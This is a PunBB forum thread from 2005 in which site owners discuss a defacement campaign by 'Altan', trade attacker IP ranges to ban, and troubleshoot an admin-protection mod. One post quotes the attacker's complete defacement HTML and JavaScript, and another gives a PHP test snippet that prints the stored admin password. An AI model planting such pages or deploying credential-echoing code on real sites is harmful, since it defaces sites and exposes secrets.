Re: Hacked by Altan

Tobi wrote:
someguy wrote:

Unfortunately it's still not working for me. sad

OK, to see if your path is correct you can just leave out the authentication part and only call the file:

...
This will show you if the file is found and parsed correctly.
If yes then it must have to do with your server settings.

sad When I do this, the page loads without even requesting a username/password.  BTW, thanks for your help on this.

77

Re: Hacked by Altan

someguy wrote:

[:( When I do this, the page loads without even requesting a username/password.

Of course it does.
This is only meant to find out if the path is correct. The page should load and it should print somewhere the username and Password.

The German PunBB Site:
PunBB-forum.de

Re: Hacked by Altan

Rickard wrote:
MathsIsFun wrote:

(BTW it wouldn't let me type my address on Firefox, but went through in IE)

Huh? I'm not sure I understand.

Maybe it's just me, but when I open http://punbb.org/newsletter.php in Firefox, and try to type in an email address it keeps popping me out of the box. I have found that if I click in the box and keep my finger on the left mouse button then I can type. Strange. Works fine in IE6.

Re: Hacked by Altan

Yes, you're right. What the? smile

"Programming is like sex: one mistake and you have to support it for the rest of your life."

Re: Hacked by Altan

Fixed it. I had placed a hidden form element inside the label for the e-mail field. E.g:

<label><strong>E-mail address</strong><br />
<input type="hidden" name="form_sent" value="1" />
<input type="text" name="req_email" size="50" maxlength="80" /><br /></label>

That's not a good idea smile

"Programming is like sex: one mistake and you have to support it for the rest of your life."

Re: Hacked by Altan

Tobi wrote:
someguy wrote:

[:( When I do this, the page loads without even requesting a username/password.

Of course it does.
This is only meant to find out if the path is correct. The page should load and it should print somewhere the username and Password.

Perhaps I wasn't specific enough.  When I make the suggested changes, it doesn't ask me for a username and password; it just loads the page and does not display any additional info.  In fact, it doesn't even look like it is entering the "else" part of the if/else statement.  If I place echo "JUNK"; before the "} else", I see JUNK displayed on the page.  I assume this is a server setting issue.

82

Re: Hacked by Altan

OK,
then just make an empty file in the pun installtion directory.

Write there

<?
$auth = file("./admin_pass.pwd");
list($user, $password) = split(":", trim($auth[0]));
echo "User is $user and password is $password";
?>

make sure the path to admin_pass.pwd is correct
and see if it displays anything.

The German PunBB Site:
PunBB-forum.de

83

Re: Hacked by Altan

Damn, too many forums to keep up with. That newsletter ought to help Rickard - thanks!

Hacked just yesterday - lost 2 forums. Have upgraded to 1.2.6 (yeah I know...), and applied the changes for checking during the registration process as well as the Admin security Mod supplied by Tobi. I've also added an htaccess file to my Punbb install which blocks anyone from the IP block of 81.214.0.0 from even getting access to my site. Had to do the same for a block in Germany - 84.165.0.0.

Have I missed something that needs/should be changed to protect my forums?

84

Re: Hacked by Altan

I've downloaded and installed v1.2.7

The changelog indicates a few vulnerabilities were fixed. Are we reasonably sure that this latest version is tight without the need to add the security mods posted earlier in this thread?

Re: Hacked by Altan

we are always unsure that it is secure, we thought 1.2.6 was secure but it wasn't which is why 1.2.7 is released, the good news is there are no known problems with 1.2.7 and if there are problems chances are Smartys or someone else who is not on the "dark side" will find it and alert Rickard before there is mass hacking. Its just the way the internet is.

86

Re: Hacked by Altan

Am I correct that the vulnerability fixed in 1.2.7 only effects forums with register_globals on?

Re: Hacked by Altan

If by "the vulnerability" you mean the one in search, yes
If you mean the ones in the admin interface, I'd have to check, but I don't think it matters

88

Re: Hacked by Altan

>> just the way the Inet is

Understood - I know there are no absolutes. smile Your answer is what I was looking for - that as far as we know the latest upgrade fixed the known holes.

Re: Hacked by Altan

Basically, keep backups as regular as possible (check with your host many take backups anyway and will help you out if you get into problems), keep up to date, don't make people you don't know admins and thats the best you can do really.

Re: Hacked by Altan

Tobi wrote:

OK,
then just make an empty file in the pun installtion directory.

Write there

<?
$auth = file("./admin_pass.pwd");
list($user, $password) = split(":", trim($auth[0]));
echo "User is $user and password is $password";
?>

make sure the path to admin_pass.pwd is correct
and see if it displays anything.

Thanks for sticking with me on this.  When I make the suggested test file, it loads fine and shows the contents of my admin_pass.pwd file just fine.

91

Re: Hacked by Altan

So that means you can open and read the file but teh .htaccess functions do not work.
This sounds like some trouble with the web server configuration.
Since I can't know about that maybe you ask your host if there's anything he can do.
Sorry for not having better news....

The German PunBB Site:
PunBB-forum.de

Re: Hacked by Altan

Tobi wrote:

So that means you can open and read the file but teh .htaccess functions do not work.
This sounds like some trouble with the web server configuration.
Since I can't know about that maybe you ask your host if there's anything he can do.
Sorry for not having better news....

Yeah... I figured as much.  Thanks for the help.

93

Re: Hacked by Altan

Now i have gotten paranoid and banned the ipseries 81.212-215.*.* in punbb.
Add this in bans should ban them all: "81.212 81.213 81.214 81.215" ?
Becouse my page is on swedish i dont think any of the other turks on the same ipseries mind..

I probably registered before you, sucker!

94

Re: Hacked by Altan

BTW I got hit by the same hack from a different IP series: 85.100.230.111, so it may be worthwhile to add 85.100 to the above string.

Re: Hacked by Altan

Well, I was bored, found out where he had that image hosted, and emailed their abuse email

Thank you for informing us.  The site has been terminated.

Regards,

Domain DLX Abuse Department

Small victory, but I was bored tongue

96

Re: Hacked by Altan

I saw the "Maintenance Mode" code earlier in the thread.  What the hacker put into my "Maintenance Mode" page seems much more malicious. Anyone with Javascript experience have and idea what this would have done had a user visited the site while it was on main't mode?

<HTML>
<HEAD>
<TITLE>Hacked by ALTANs - System Fucker</TITLE>
<META NAME="description" CONTENT="Bizim Gerçek K?ld?klar?m?za Onlar hayalleriyle Eri?emedi">
<META NAME="author" CONTENT="ALTANs"> 
<LINK REV="made" href="mailto:turkogluturk18@hotmail.com">
<META http-equiv=Content-Type content="text/html; charset=windows-1254">
<META content="MSHTML 6.00.2900.2722" name=GENERATOR></HEAD>
<BODY text=#000080 vLink=#000080 aLink=#000080 link=#000080 bgColor=#ffffff onload=init()>
<P align=center>
<DIV class=ttl1 id=ttl0>
<SCRIPT language=JavaScript>
var message="";
/////////////////////////////////// sa? tu? close 
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} 
  </SCRIPT>
</DIV><BR>
<META http-equiv=Content-Language content=tr>
<STYLE type=text/css>B {
    FONT-WEIGHT: bold
}
#ttl0 {
    POSITION: absolute
}
.ttl1 {
    FONT: 8pt Verdana,Arial,Helvetica,serif
}
.p {
    color : #000080;
}
.d {
    color : #000000;
    background-color : #ffff00;
}
</STYLE>
<SCRIPT language=JAVASCRIPT type=text/javascript>var layers=document.layers,style=document.all,both=layers||style,idme=908601;if(layers){layerRef='document.layers';styleRef='';}if(style){layerRef='document.all';styleRef='.style';}function writeOnText(obj,str){if(layers)with(document[obj]){document.open();document.write(str);document.close();}if(style)eval(obj+'.innerHTML= str');}var dispStr=new Array("<font color=008000><!--#include file="database.asp"--></font><br><font color=008000><!--#include file="Server-CreateObject.asp"--></font><br><br><font class=d><%</font></b><br><font color=000080>If <b>hacked</b>.eof <b>then</b><br><font color=000080>Response.Write (" This Web Page Hacked ") <br>Response.Write ("<font color=800080><b> Hacked by ALTANs </b></font>") </b><font color=000080><br>Response.Write (" RSA key fingerprint : 4f:b8:e8:83:h7:82:1g:t4:2e:49:72:41:f2:19:66:ea ")<br>Response.Write (" Are you sure you want to continue connecting (yes/no)? ")<br>Response.Write (" yes ")<br>Response.Write (" Root: ALTANs  ")<br>Response.Write (" password: ******* ")<br>Response.Write (" Md5  : 3f3082fd88c694198de78162285940bf  ")<br>Response.Write (" Checksum : <b> --->> Game Ower :) </b>  ")<br><b>End If</b><br><font class=d>%></font><br><br><br><br><center><b> www.SanalDevrim.net <br> altan@sanaldevrim.net </center></p><br><br>"
);var overMe=0;function txtTyper(str,idx,idObj,spObj,clr1,clr2,delay,plysnd){var tmp0=tmp1='',skip=0;if(both&&idx<=str.length){if(str.charAt(idx)=='<'){while(str.charAt(idx)!='>')idx++;idx++;}if(str.charAt(idx)=='&'&&str.charAt(idx+1)!=' '){while(str.charAt(idx)!=';')idx++;idx++;}tmp0=str.slice(0,idx);tmp1=str.charAt(idx++);if(overMe==0&&plysnd==10){if(navigator.plugins[0]){if(navigator.plugins["LiveAudio"][100].type=="audio/basic"&&navigator.javaEnabled()){document.embeds[0].stop();setTimeout("document.embeds[0].play(false)",10000);}}else if(document.all){ding.Stop(100);setTimeout("ding.Run()",100);}overMe=1;}else overMe=0;writeOnText(idObj,"<span class="+spObj+"><font color='"+clr1+"'>"+tmp0+"</font><font color='"+clr2+"'>"+tmp1+"</font></span>");setTimeout("txtTyper('"+str+"', "+idx+", '"+idObj+"', '"+spObj+"', '"+clr1+"', '"+clr2+"', "+delay+" ,"+plysnd+")",delay);}}function init(){txtTyper(dispStr[0],0,'ttl0','ttl1','#00ff60 ','#40ff60',50,0);}</SCRIPT>
</BODY></HTML>

97 (edited by Smartys 2005-09-11 00:32)

Re: Hacked by Altan

rofl tongue
Not malicious, trying to be 1337 (at least as far as I see) tongue

The text it displays:

<!--#include file="database.asp"-->
<!--#include file="Server-CreateObject.asp"-->

<%
If hacked.eof then
Response.Write (" This Web Page Hacked ") 
Response.Write (" Hacked by ALTANs ") 
Response.Write (" RSA key fingerprint : 4f:b8:e8:83:h7:82:1g:t4:2e:49:72:41:f2:19:66:ea ")
Response.Write (" Are you sure you want to continue connecting (yes/no)? ")
Response.Write (" yes ")
Response.Write (" Root: ALTANs ")
Response.Write (" password: ******* ")
Response.Write (" Md5 : 3f3082fd88c694198de78162285940bf ")
Response.Write (" Checksum : --->> Game Ower :) ")
End If
%>




www.SanalDevrim.net 
altan@sanaldevrim.net

Edit: Now then, lets see what their hosting company says about that site smile

98

Re: Hacked by Altan

It just seemed to be doing a lot more than the previous code did.  I know nothing on JS at all.  I'm assuming it played some sounds.  Does the script seem to be sending data somewhere when it runs?  That was my concern.

99 (edited by Smartys 2005-09-11 00:46)

Re: Hacked by Altan

I didn't hear any sounds, and from what I've seen it doesn't appear to be sending anything anywhere, just writing that text

Edit: http://www.whois.sc/sanaldevrim.net
Yay for Turkish registars!

100

Re: Hacked by Altan

i got hit this morning from 85.100.230.111.  he erased 2 forums too.  sad

i was lagging on updating - stupid me.

i'm hoping my host can restore them.

if not, is there anything i need to change in the db or look for to see if he changed anything?

thanks..